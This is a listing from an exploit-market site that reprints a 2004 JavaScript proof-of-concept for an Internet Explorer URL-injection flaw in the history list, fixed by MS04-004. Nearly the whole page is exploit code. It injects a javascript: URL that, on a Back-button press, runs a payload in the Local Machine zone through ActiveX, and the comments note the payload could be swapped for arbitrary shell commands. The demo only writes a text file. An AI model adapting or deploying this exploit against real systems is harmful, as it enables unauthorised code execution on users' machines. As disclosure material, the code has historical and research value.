[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MS Internet Explorer URL Injection in History List (MS04-004)

Author
Andreas Sandblad
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8374
Category
remote exploits
Date add
04-02-2004
Platform
unsorted
=============================================================
MS Internet Explorer URL Injection in History List (MS04-004)
=============================================================

// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name:     payload
// Purpose:  Run payload code called from Local Machine zone.
//           The code may be arbitrary such as executing shell commands.
//           This demo simply creates a harmless textfile on the desktop.
function payload() {
  file = "sandblad.txt";
  o = new ActiveXObject("ADODB.Stream");
  o.Open();
  o.Type=2;
  o.Charset="ascii";
  o.WriteText("You are vulnerable!");
  o.SaveToFile(file, 2);
  o.Close();
  alert("File "+file+" created on desktop!");
}

// Name:     trigger
// Purpose:  Inject javascript url in history list and run payload
//           function when the user hits the backbutton.
function trigger(len) {
  if (history.length != len)
    payload();
  else
    return "<title>-</title><body
onload=external.NavigateAndFind('res:','','')>";
}

// Name:    backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
  location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
  backbutton();


 

#  0day.today [2024-12-25]  #